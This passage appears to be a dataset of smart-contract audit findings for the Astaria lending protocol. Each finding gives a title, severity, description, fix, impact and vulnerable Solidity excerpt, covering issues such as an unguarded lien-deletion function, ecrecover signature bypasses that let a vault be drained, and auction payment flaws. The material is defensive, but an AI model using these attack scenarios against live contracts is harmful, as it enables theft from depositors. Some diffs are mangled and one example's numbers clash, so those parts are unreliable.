IAstariaRouter.LienDetails memory ld)\\n {\\n require(\\n commitment.lienRequest.strategy.deadline >= block.timestamp,\\n \"deadline passed\"\\n );\\n\\n\\n require(\\n strategyValidators[commitment.lienRequest.nlrType] != address(0),\\n \"invalid strategy type\"\\n );\\n\\n\\n bytes32 leaf;\\n (leaf, ld) = IStrategyValidator(\\n strategyValidators[commitment.lienRequest.nlrType]\\n ).validateAndParse(\\n commitment.lienRequest,\\n COLLATERAL_TOKEN.ownerOf(\\n commitment.tokenContract.computeId(commitment.tokenId)\\n ),\\n commitment.tokenContract,\\n commitment.tokenId\\n );\\n\\n\\n return (\\n MerkleProof.verifyCalldata(\\n commitment.lienRequest.merkle.proof,\\n commitment.lienRequest.merkle.root,\\n leaf\\n ),\\n ld\\n );\\n }\\n```\\n -The implied value of a public vault can be impaired, liquidity providers can lose fundsчhighчThe implied value of a public vault can be impaired, liquidity providers can lose funds\\nBorrowers can partially repay their liens, which is handled by the `_payment` function (LienToken.sol#L594). When repaying a part of a lien, `lien.amount` is updated to include currently accrued debt (LienToken.sol#L605-L617):\\n```\\nLien storage lien = lienData[lienId];\\nlien.amount = _getOwed(lien); // @audit current debt, including accrued interest; saved to storage!\\n```\\n\\nNotice that `lien.amount` is updated in storage, and `lien.last` wasn't updated.\\nThen, lien's slope is subtracted from vault's slope accumulator to be re-calculated after the repayment (LienToken.sol#L620-L630):\\n```\\nif (isPublicVault) {\\n // @audit calculates and subtracts lien's slope from vault's slope\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n}\\nif (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n // @audit lien.last is updated only after payment amount subtraction\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n // @audit re-calculates and re-applies lien's slope after the repayment\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n}\\n```\\n\\nIn the `beforePayment` function, `LIEN_TOKEN().calculateSlope(lienId)` is called to calculate lien's current slope (PublicVault.sol#L433-L442):\\n```\\nfunction beforePayment(uint256 lienId, uint256 amount) public onlyLienToken {\\n _handleStrategistInterestReward(lienId, amount);\\n uint256 lienSlope = LIEN_TOKEN().calculateSlope(lienId);\\n if (lienSlope > slope) {\\n slope = 0;\\n } else {\\n slope -= lienSlope;\\n }\\n last = block.timestamp;\\n}\\n```\\n\\nThe `calculateSlope` function reads a lien from storage and calls `_getOwed` again (LienToken.sol#L440-L445):\\n```\\nfunction calculateSlope(uint256 lienId) public view returns (uint256) {\\n // @audit lien.amount includes interest accrued so far\\n Lien memory lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n uint256 owedAtEnd = _getOwed(lien, end);\\n // @audit lien.last wasn't updated in `_payment`, it's an older timestamp\\n return (owedAtEnd - lien.amount).mulDivDown(1, end - lien.last);\\n}\\n```\\n\\nThis is where double counting of accrued interest happens. Recall that lien's amount already includes the interest that was accrued by this moment (in the `_payment` function). Now, interest is calculated again and is applied to the amount that already includes (a portion) it (LienToken.sol#L544-L550):\\n```\\nfunction _getOwed(Lien memory lien, uint256 timestamp)\\n internal\\n view\\n returns (uint256)\\n{\\n // @audit lien.amount already includes interest accrued so far\\n return lien.amount + _getInterest(lien, timestamp);\\n}\\n```\\n\\nLienToken.sol#L177-L196:\\n```\\nfunction _getInterest(Lien memory lien, uint256 timestamp)\\n internal\\n view\\n returns (uint256)\\n{\\n if (!lien.active) {\\n return uint256(0);\\n }\\n uint256 delta_t;\\n if (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n } else {\\n // @audit lien.last wasn't updated in `_payment`, so the `delta_t` is bigger here\\n delta_t = uint256(timestamp.safeCastTo32() - lien.last);\\n }\\n return\\n // @audit rate applied to a longer delta_t and multiplied by a bigger amount than expected\\n delta_t.mulDivDown(lien.rate, 1).mulDivDown(\\n lien.amount,\\n INTEREST_DENOMINATOR\\n );\\n}\\n```\\nчIn the `_payment` function, consider updating `lien.amount` after the `beforePayment` call:\\n```\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/src/LienToken.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/LienToken.sol\\n@@ // Remove the line below\\n614,12 // Add the line below\\n614,13 @@ contract LienToken is ERC721, ILienToken, Auth, TransferAgent {\\n type(IPublicVault).interfaceId\\n );\\n\\n// Remove the line below\\n lien.amount = _getOwed(lien);\\n// Remove the line below\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n// Add the line below\\n\\n// Add the line below\\n lien.amount = _getOwed(lien);\\n// Add the line below\\n\\n if (lien.amount > paymentAmount) {\\n lien.amount // Remove the line below\\n= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n```\\n\\nIn this case, lien's slope calculation won't be affected in the `beforePayment` call and the correct slope will be removed from the slope accumulator.чDouble counting of interest will result in a wrong lien slope, which will affect the vault's slope accumulator. This will result in an invalid implied value of a vault (PublicVault.sol#L406-L413):\\nIf miscalculated lien slope is bigger than expected, vault's slope will be smaller than expected (due to the subtraction in beforePayment), and vault's implied value will also be smaller. Liquidity providers will lose money because they won't be able to redeem the whole liquidity (vault's implied value, `totalAssets`, is used in the conversion of LP shares, ERC4626-Cloned.sol#L392-L412)\\nIf miscalculated lien slope is smaller than expected, vault's slope will be higher, and vaults implied value will also be higher. However, it won't be backed by actual liquidity, thus the liquidity providers that exit earlier will get a bigger share of the underlying assets. The last liquidity provider won't be able to get their entire share.ч```\\nLien storage lien = lienData[lienId];\\nlien.amount = _getOwed(lien); // @audit current debt, including accrued interest; saved to storage!\\n```\\n -buyoutLien() will cause the vault to fail to processEpoch()чhighчLienToken#buyoutLien() did not reduce vault#liensOpenForEpoch when vault#processEpoch()will check vault#liensOpenForEpoch[currentEpoch] == uint256(0) so processEpoch() will fail\\nwhen create LienToken , vault#liensOpenForEpoch[currentEpoch] will ++ when repay or liquidate , vault#liensOpenForEpoch[currentEpoch] will -- and LienToken#buyoutLien() will transfer from vault to to other receiver,so liensOpenForEpoch need reduce\\n```\\nfunction buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n // rest of code.\\n /**** tranfer but not liensOpenForEpoch-- *****/\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\nчIssue buyoutLien() will cause the vault to fail to processEpoch()\\n```\\n function buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n// rest of code.\\n\\n+ //do decreaseEpochLienCount()\\n+ address lienOwner = ownerOf(lienId);\\n+ bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n+ type(IPublicVault).interfaceId\\n+ );\\n+ if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) { \\n+ IPublicVault(lienOwner).decreaseEpochLienCount(\\n+ IPublicVault(lienOwner).getLienEpoch(lienData[lienId].start + lienData[lienId].duration)\\n+ );\\n+ } \\n\\n lienData[lienId].last = block.timestamp.safeCastTo32();\\n lienData[lienId].start = block.timestamp.safeCastTo32();\\n lienData[lienId].rate = ld.rate.safeCastTo240();\\n lienData[lienId].duration = ld.duration.safeCastTo32();\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\nчprocessEpoch() maybe failч```\\nfunction buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n // rest of code.\\n /**** tranfer but not liensOpenForEpoch-- *****/\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\n -_deleteLienPosition can be called by anyone to delete any lien they wishчhighч`_deleteLienPosition` is a public function that doesn't check the caller. This allows anyone to call it an remove whatever lien they wish from whatever collateral they wish\\n```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, \"index out of bounds\");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n\\n`_deleteLienPosition` is a `public` function and doesn't validate that it's being called by any permissioned account. The result is that anyone can call it to delete any lien that they want. It wouldn't remove the lien data but it would remove it from the array associated with `collateralId`, which would allow it to pass the `CollateralToken.sol#releaseCheck` and the underlying to be withdrawn by the user.чChange `_deleteLienPosition` to `internal` rather than `public`.чAll liens can be deleted completely rugging lendersч```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, \"index out of bounds\");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n -Public vaults can become insolvent because of missing `yIntercept` updateчhighчThe deduction of `yIntercept` during payments is missing in `beforePayment()` which can lead to vault insolvency.\\n`yIntercept` is declared as \"sum of all LienToken amounts\" and documented elsewhere as \"yIntercept (virtual assets) of a PublicVault\". It is used to calculate the total assets of a public vault as: slope.mulDivDown(delta_t, 1) + `yIntercept`.\\nIt is expected to be updated on deposits, payments, withdrawals, liquidations. However, the deduction of `yIntercept` during payments is missing in `beforePayment()`. As noted in the function's Natspec:\\n```\\n /**\\n * @notice Hook to update the slope and yIntercept of the PublicVault on payment.\\n * The rate for the LienToken is subtracted from the total slope of the PublicVault, and recalculated in afterPayment().\\n * @param lienId The ID of the lien.\\n * @param amount The amount paid off to deduct from the yIntercept of the PublicVault.\\n */\\n```\\n\\nthe amount of payment should be deducted from `yIntercept` but is missing.чIssue Public vaults can become insolvent because of missing `yIntercept` update\\nUpdate `yIntercept` in `beforePayment()` by the `amount` value.чThis missing update will inflate the inferred value of the public vault corresponding to its actual value leading to eventual insolvency because of resulting protocol miscalculations.ч```\\n /**\\n * @notice Hook to update the slope and yIntercept of the PublicVault on payment.\\n * The rate for the LienToken is subtracted from the total slope of the PublicVault, and recalculated in afterPayment().\\n * @param lienId The ID of the lien.\\n * @param amount The amount paid off to deduct from the yIntercept of the PublicVault.\\n */\\n```\\n -Bidder can cheat auction by placing bid much higher than reserve price when there are still open liens against a tokenчhighчWhen a token still has open liens against it only the value of the liens will be paid by the bidder but their current bid will be set to the full value of the bid. This can be abused in one of two ways. The bidder could place a massive bid like 500 ETH that will never be outbid or they could place a bid they know will outbid and profit the difference when they're sent a refund.\\n```\\nuint256[] memory liens = LIEN_TOKEN.getLiens(tokenId);\\nuint256 totalLienAmount = 0;\\nif (liens.length > 0) {\\n for (uint256 i = 0; i < liens.length; ++i) {\\n uint256 payment;\\n uint256 lienId = liens[i];\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN.getLien(lienId);\\n\\n if (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n} else {\\n //@audit-issue logic skipped if liens.length > 0\\n TRANSFER_PROXY.tokenTransferFrom(\\n weth,\\n payer,\\n COLLATERAL_TOKEN.ownerOf(tokenId),\\n transferAmount\\n );\\n}\\n```\\n\\nWe can examine the payment logic inside `_handleIncomingPayment` and see that if there are still open liens against then only the amount of WETH to pay back the liens will be taken from the payer, since the else portion of the logic will be skipped.\\n```\\nuint256 vaultPayment = (amount - currentBid);\\n\\nif (firstBidTime == 0) {\\n auctions[tokenId].firstBidTime = block.timestamp.safeCastTo64();\\n} else if (lastBidder != address(0)) {\\n uint256 lastBidderRefund = amount - vaultPayment;\\n _handleOutGoingPayment(lastBidder, lastBidderRefund);\\n}\\n_handleIncomingPayment(tokenId, vaultPayment, address(msg.sender));\\n\\nauctions[tokenId].currentBid = amount;\\nauctions[tokenId].bidder = address(msg.sender);\\n```\\n\\nIn `createBid`, `auctions[tokenId].currentBid` is set to `amount` after the last bidder is refunded and the excess is paid against liens. We can walk through an example to illustrate this:\\nAssume a token with a single lien of amount 10 WETH and an auction is opened for that token. Now a user places a bid for 20 WETH. They are the first bidder so `lastBidder = address(0)` and `currentBid = 0`. `_handleIncomingPayment` will be called with a value of 20 WETH since there is no lastBidder to refund. Inside `_handleIncomingPayment` the lien information is read showing 1 lien against the token. Since `transferAmount >= lien.amount`, `payment = lien.amount`. A payment will be made by the bidder against the lien for 10 WETH. After the payment `_handleIncomingPayment` will return only having taken 10 WETH from the bidder. In the next line currentBid is set to 20 WETH but the bidder has only paid 10 WETH. Now if they are outbid, the new bidder will have to refund then 20 WETH even though they initially only paid 10 WETH.чIn `_handleIncomingPayment`, all residual transfer amount should be sent to `COLLATERAL_TOKEN.ownerOf(tokenId)`.чBidder can steal funds due to `_handleIncomingPayment` not taking enough WETHч```\\nuint256[] memory liens = LIEN_TOKEN.getLiens(tokenId);\\nuint256 totalLienAmount = 0;\\nif (liens.length > 0) {\\n for (uint256 i = 0; i < liens.length; ++i) {\\n uint256 payment;\\n uint256 lienId = liens[i];\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN.getLien(lienId);\\n\\n if (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n} else {\\n //@audit-issue logic skipped if liens.length > 0\\n TRANSFER_PROXY.tokenTransferFrom(\\n weth,\\n payer,\\n COLLATERAL_TOKEN.ownerOf(tokenId),\\n transferAmount\\n );\\n}\\n```\\n -Possible to fully block PublicVault.processEpoch function. No one will be able to receive their fundsчhighчPossible to fully block `PublicVault.processEpoch` function. No one will be able to receive their funds\\nWhen liquidity providers want to redeem their share from `PublicVault` they call `redeemFutureEpoch` function which will create new `WithdrawProxy` for the epoch(if not created already) and then mint shares for redeemer in `WithdrawProxy`. `PublicVault` transfer user's shares to himself.\\n```\\n function redeemFutureEpoch(\\n uint256 shares,\\n address receiver,\\n address owner,\\n uint64 epoch\\n ) public virtual returns (uint256 assets) {\\n // check to ensure that the requested epoch is not the current epoch or in the past\\n require(epoch >= currentEpoch, \"Exit epoch too low\");\\n\\n\\n require(msg.sender == owner, \"Only the owner can redeem\");\\n // check for rounding error since we round down in previewRedeem.\\n\\n\\n ERC20(address(this)).safeTransferFrom(owner, address(this), shares);\\n\\n\\n // Deploy WithdrawProxy if no WithdrawProxy exists for the specified epoch\\n _deployWithdrawProxyIfNotDeployed(epoch);\\n\\n\\n emit Withdraw(msg.sender, receiver, owner, assets, shares);\\n\\n\\n // WithdrawProxy shares are minted 1:1 with PublicVault shares\\n WithdrawProxy(withdrawProxies[epoch]).mint(receiver, shares); // was withdrawProxies[withdrawEpoch]\\n }\\n```\\n\\nThis function mints `WithdrawProxy` shares 1:1 to redeemed `PublicVault` shares. Then later after call of `processEpoch` and `transferWithdrawReserve` the funds will be sent to the `WithdrawProxy` and users can now redeem their shares from it.\\nFunction `processEpoch` decides how many funds should be sent to the `WithdrawProxy`.\\n```\\n if (withdrawProxies[currentEpoch] != address(0)) {\\n uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch])\\n .totalSupply();\\n\\n\\n liquidationWithdrawRatio = proxySupply.mulDivDown(1e18, totalSupply());\\n\\n\\n if (liquidationAccountants[currentEpoch] != address(0)) {\\n LiquidationAccountant(liquidationAccountants[currentEpoch])\\n .setWithdrawRatio(liquidationWithdrawRatio);\\n }\\n\\n\\n uint256 withdrawAssets = convertToAssets(proxySupply);\\n // compute the withdrawReserve\\n uint256 withdrawLiquidations = liquidationsExpectedAtBoundary[\\n currentEpoch\\n ].mulDivDown(liquidationWithdrawRatio, 1e18);\\n withdrawReserve = withdrawAssets - withdrawLiquidations;\\n // burn the tokens of the LPs withdrawing\\n _burn(address(this), proxySupply);\\n\\n\\n _decreaseYIntercept(withdrawAssets);\\n }\\n```\\n\\nThis is how it is decided how much money should be sent to WithdrawProxy. Firstly, we look at totalSupply of WithdrawProxy. `uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch]).totalSupply();`.\\nAnd then we convert them to assets amount. `uint256 withdrawAssets = convertToAssets(proxySupply);`\\nIn the end function burns `proxySupply` amount of shares controlled by PublicVault. `_burn(address(this), proxySupply);`\\nThen this amount is allowed to be sent(if no auctions currently, but this is not important right now).\\nThis all allows to attacker to make `WithdrawProxy.deposit` to mint new shares for him and increase totalSupply of WithdrawProxy, so `proxySupply` becomes more then was sent to `PublicVault`.\\nThis is attack scenario.\\n1.PublicVault is created and funded with 50 ethers. 2.Someone calls `redeemFutureEpoch` function to create new WithdrawProxy for next epoch. 3.Attacker sends 1 wei to WithdrawProxy to make totalAssets be > 0. Attacker deposit to WithdrawProxy 1 wei. Now WithdrawProxy.totalSupply > PublicVault.balanceOf(PublicVault). 4.Someone call `processEpoch` and it reverts on burning.\\nAs result, nothing will be send to WithdrawProxy where shares were minted for users. The just lost money.\\nAlso this attack can be improved to drain users funds to attacker. Attacker should be liquidity provider. And he can initiate next redeem for next epoch, then deposit to new WithdrawProxy enough amount to get new shares. And call `processEpoch` which will send to the vault amount, that was not sent to previous attacked WithdrawProxy, as well. So attacker will take those funds.чMake function WithdrawProxy.deposit not callable.чFunds of PublicVault depositors are stolen.ч```\\n function redeemFutureEpoch(\\n uint256 shares,\\n address receiver,\\n address owner,\\n uint64 epoch\\n ) public virtual returns (uint256 assets) {\\n // check to ensure that the requested epoch is not the current epoch or in the past\\n require(epoch >= currentEpoch, \"Exit epoch too low\");\\n\\n\\n require(msg.sender == owner, \"Only the owner can redeem\");\\n // check for rounding error since we round down in previewRedeem.\\n\\n\\n ERC20(address(this)).safeTransferFrom(owner, address(this), shares);\\n\\n\\n // Deploy WithdrawProxy if no WithdrawProxy exists for the specified epoch\\n _deployWithdrawProxyIfNotDeployed(epoch);\\n\\n\\n emit Withdraw(msg.sender, receiver, owner, assets, shares);\\n\\n\\n // WithdrawProxy shares are minted 1:1 with PublicVault shares\\n WithdrawProxy(withdrawProxies[epoch]).mint(receiver, shares); // was withdrawProxies[withdrawEpoch]\\n }\\n```\\n -Any public vault without a delegate can be drainedчhighчIf a public vault is created without a delegate, delegate will have the value of `address(0)`. This is also the value returned by `ecrecover` for invalid signatures (for example, if v is set to a position number that is not 27 or 28), which allows a malicious actor to cause the signature validation to pass for arbitrary parameters, allowing them to drain a vault using a worthless NFT as collateral.\\nWhen a new Public Vault is created, the Router calls the `init()` function on the vault as follows:\\n```\\nVaultImplementation(vaultAddr).init(\\n VaultImplementation.InitParams(delegate)\\n);\\n```\\n\\nIf a delegate wasn't set, this will pass `address(0)` to the vault. If this value is passed, the vault simply skips the assignment, keeping the delegate variable set to the default 0 value:\\n```\\nif (params.delegate != address(0)) {\\n delegate = params.delegate;\\n}\\n```\\n\\nOnce the delegate is set to the zero address, any commitment can be validated, even if the signature is incorrect. This is because of a quirk in `ecrecover` which returns `address(0)` for invalid signatures. A signature can be made invalid by providing a positive integer that is not 27 or 28 as the `v` value. The result is that the following function call assigns recovered = address(0):\\n```\\n address recovered = ecrecover(\\n keccak256(\\n encodeStrategyData(\\n params.lienRequest.strategy,\\n params.lienRequest.merkle.root\\n )\\n ),\\n params.lienRequest.v,\\n params.lienRequest.r,\\n params.lienRequest.s\\n );\\n```\\n\\nTo confirm the validity of the signature, the function performs two checks:\\n```\\nrequire(\\n recovered == params.lienRequest.strategy.strategist,\\n \"strategist must match signature\"\\n);\\nrequire(\\n recovered == owner() || recovered == delegate,\\n \"invalid strategist\"\\n);\\n```\\n\\nThese can be easily passed by setting the `strategist` in the params to `address(0)`. At this point, all checks will pass and the parameters will be accepted as approved by the vault.\\nWith this power, a borrower can create params that allow them to borrow the vault's full funds in exchange for a worthless NFT, allowing them to drain the vault and steal all the user's funds.чIssue Any public vault without a delegate can be drained\\nAdd a require statement that the recovered address cannot be the zero address:\\n```\\nrequire(recovered != address(0));\\n```\\nчAll user's funds held in a vault with no delegate set can be stolen.ч```\\nVaultImplementation(vaultAddr).init(\\n VaultImplementation.InitParams(delegate)\\n);\\n```\\n -Auctions can end in epoch after intended, underpaying withdrawersчhighчWhen liens are liquidated, the router checks if the auction will complete in a future epoch and, if it does, sets up a liquidation accountant and other logistics to account for it. However, the check for auction completion does not take into account extended auctions, which can therefore end in an unexpected epoch and cause accounting issues, losing user funds.\\nThe liquidate() function performs the following check to determine if it should set up the liquidation to be paid out in a future epoch:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n\\nThis function assumes that the auction will only end in a future epoch if the `auctionWindow` (typically set to 2 days) pushes us into the next epoch.\\nHowever, auctions can last up to an additional 1 day if bids are made within the final 15 minutes. In these cases, auctions are extended repeatedly, up to a maximum of 1 day.\\n```\\nif (firstBidTime + duration - block.timestamp < timeBuffer) {\\n uint64 newDuration = uint256(\\n duration + (block.timestamp + timeBuffer - firstBidTime)\\n ).safeCastTo64();\\n if (newDuration <= auctions[tokenId].maxDuration) {\\n auctions[tokenId].duration = newDuration;\\n } else {\\n auctions[tokenId].duration =\\n auctions[tokenId].maxDuration -\\n firstBidTime;\\n }\\n extended = true;\\n}\\n```\\n\\nThe result is that there are auctions for which accounting is set up for them to end in the current epoch, but will actual end in the next epoch.чChange the check to take the possibility of extension into account:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow() + 1 days)\\n```\\nчUsers who withdrew their funds in the current epoch, who are entitled to a share of the auction's proceeds, will not be paid out fairly.ч```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n -Strategists are paid 10x the vault fee because of a math errorчhighчStrategists set their vault fee in BPS (x / 10,000), but are paid out as x / 1,000. The result is that strategists will always earn 10x whatever vault fee they set.\\nWhenever any payment is made towards a public vault, `beforePayment()` is called, which calls `_handleStrategistInterestReward()`.\\nThe function is intended to take the amount being paid, adjust by the vault fee to get the fee amount, and convert that amount of value into shares, which are added to `strategistUnclaimedShares`.\\n```\\nfunction _handleStrategistInterestReward(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n if (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000);\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n }\\n```\\n\\nSince the vault fee is stored in basis points, to get the vault fee, we should take the amount, multiply it by `VAULT_FEE()` and divide by 10,000. However, we accidentally divide by 1,000, which results in a 10x larger reward for the strategist than intended.\\nAs an example, if the vault fee is intended to be 10%, we would set `VAULT_FEE = 1000`. In that case, for any amount paid off, we would calculate `fee = amount * 1000 / 1000` and the full amount would be considered a fee for the strategist.чChange the `1000` in the `_handleStrategistInterestReward()` function to `10_000`.чStrategists will be paid 10x the agreed upon rate for their role, with the cost being borne by users.ч```\\nfunction _handleStrategistInterestReward(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n if (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000);\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n }\\n```\\n -Claiming liquidationAccountant will reduce vault y-intercept by more than the correct amountчhighчWhen `claim()` is called on the Liquidation Accountant, it decreases the y-intercept based on the balance of the contract after funds have been distributed, rather than before. The result is that the y-intercept will be decreased more than it should be, siphoning funds from all users.\\nWhen `LiquidationAccountant.sol:claim()` is called, it uses its `withdrawRatio` to send some portion of its earnings to the `WITHDRAW_PROXY` and the rest to the vault.\\nAfter performing these transfers, it updates the vault's y-intercept, decreasing it by the gap between the expected return from the auction, and the reality of how much was sent back to the vault:\\n```\\nPublicVault(VAULT()).decreaseYIntercept(\\n (expected - ERC20(underlying()).balanceOf(address(this))).mulDivDown(\\n 1e18 - withdrawRatio,\\n 1e18\\n )\\n);\\n```\\n\\nThis rebalancing uses the balance of the `liquidationAccountant` to perform its calculation, but it is done after the balance has already been distributed, so it will always be 0.\\nLooking at an example:\\n`expected = 1 ether` (meaning the y-intercept is currently based on this value)\\n`withdrawRatio = 0` (meaning all funds will go back to the vault)\\nThe auction sells for exactly 1 ether\\n1 ether is therefore sent directly to the vault\\nIn this case, the y-intercept should not be updated, as the outcome was equal to the `expected` outcome\\nHowever, because the calculation above happens after the funds are distributed, the decrease equals `(expected - 0) * 1e18 / 1e18`, which equals `expected`\\nThat decrease should not happen, and causing problems for the protocol's accounting. For example, when `withdraw()` is called, it uses the y-intercept in its calculation of the `totalAssets()` held by the vault, creating artificially low asset values for a given number of shares.чThe amount of assets sent to the vault has already been calculated, as we've already sent it. Therefore, rather than the full existing formula, we can simply call:\\n```\\nPublicVault(VAULT()).decreaseYIntercept(expected - balance)\\n```\\n\\nAlternatively, we can move the current code above the block of code that transfers funds out (L73).чEvery time the liquidation accountant is used, the vault's math will be thrown off and user shares will be falsely diluted.ч```\\nPublicVault(VAULT()).decreaseYIntercept(\\n (expected - ERC20(underlying()).balanceOf(address(this))).mulDivDown(\\n 1e18 - withdrawRatio,\\n 1e18\\n )\\n);\\n```\\n -liquidationAccountant can be claimed at any timeчhighчNew liquidations are sent to the `liquidationAccountant` with a `finalAuctionTimestamp` value, but the actual value that is passed in is simply the duration of an auction. The `claim()` function uses this value in a require check, so this error will allow it to be called before the auction is complete.\\nWhen a lien is liquidated, `AstariaRouter.sol:liquidate()` is called. If the lien is set to end in a future epoch, we call `handleNewLiquidation()` on the `liquidationAccountant`.\\nOne of the values passed in this call is the `finalAuctionTimestamp`, which updates the `finalAuctionEnd` variable in the `liquidationAccountant`. This value is then used to protect the `claim()` function from being called too early.\\nHowever, when the router calls `handleLiquidationAccountant()`, it passes the duration of an auction rather than the final timestamp:\\n```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n\\nAs a result, `finalAuctionEnd` will be set to 259200 (3 days).\\nWhen `claim()` is called, it requires the final auction to have ended for the function to be called:\\n```\\nrequire(\\n block.timestamp > finalAuctionEnd || finalAuctionEnd == uint256(0),\\n \"final auction has not ended\"\\n);\\n```\\n\\nBecause of the error above, `block.timestamp` will always be greater than `finalAuctionEnd`, so this will always be permitted.чAdjust the call from the router to use the ending timestamp as the argument, rather than the duration:\\n```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n block.timestamp + COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\nчAnyone can call `claim()` before an auction has ended. This can cause many problems, but the clearest is that it can ruin the protocol's accounting by decreasing the Y intercept of the vault.\\nFor example, if `claim()` is called before the auction, the returned value will be 0, so the Y intercept will be decreased as if there was an auction that returned no funds.ч```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n -Incorrect fees will be chargedчhighчIf user has provided transferAmount which is greater than all lien.amount combined then initiatorPayment will be incorrect since it is charged on full amount when only partial was used as shown in poc\\nObserve the _handleIncomingPayment function\\nLets say transferAmount was 1000\\ninitiatorPayment is calculated on this full transferAmount\\n```\\nuint256 initiatorPayment = transferAmount.mulDivDown(\\n auction.initiatorFee,\\n 100\\n ); \\n```\\n\\nNow all lien are iterated and lien.amount is kept on deducting from transferAmount until all lien are navigated\\n```\\nif (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n```\\n\\nLets say after loop completes the transferAmount is still left as 100\\nThis means only 400 transferAmount was used but fees was deducted on full amount 500чCalculate the exact amount of transfer amount required for the transaction and calculate the initiator fee based on this amountчExcess initiator fees will be deducted which was not requiredч```\\nuint256 initiatorPayment = transferAmount.mulDivDown(\\n auction.initiatorFee,\\n 100\\n ); \\n```\\n -isValidRefinance checks both conditions instead of one, leading to rejection of valid refinancesчhighч`isValidRefinance()` is intended to check whether either (a) the loan interest rate decreased sufficiently or (b) the loan duration increased sufficiently. Instead, it requires both of these to be true, leading to the rejection of valid refinances.\\nWhen trying to buy out a lien from `LienToken.sol:buyoutLien()`, the function calls `AstariaRouter.sol:isValidRefinance()` to check whether the refi terms are valid.\\n```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n\\nOne of the roles of this function is to check whether the rate decreased by more than 0.5%. From the docs:\\nAn improvement in terms is considered if either of these conditions is met:\\nThe loan interest rate decrease by more than 0.5%.\\nThe loan duration increases by more than 14 days.\\nThe currently implementation of the code requires both of these conditions to be met:\\n```\\nreturn (\\n newLien.rate >= minNewRate &&\\n ((block.timestamp + newLien.duration - lien.start - lien.duration) >= minDurationIncrease)\\n);\\n```\\nчChange the AND in the return statement to an OR:\\n```\\nreturn (\\n newLien.rate >= minNewRate ||\\n ((block.timestamp + newLien.duration - lien.start - lien.duration) >= minDurationIncrease)\\n);\\n```\\nчValid refinances that meet one of the two criteria will be rejected.ч```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n -isValidRefinance will approve invalid 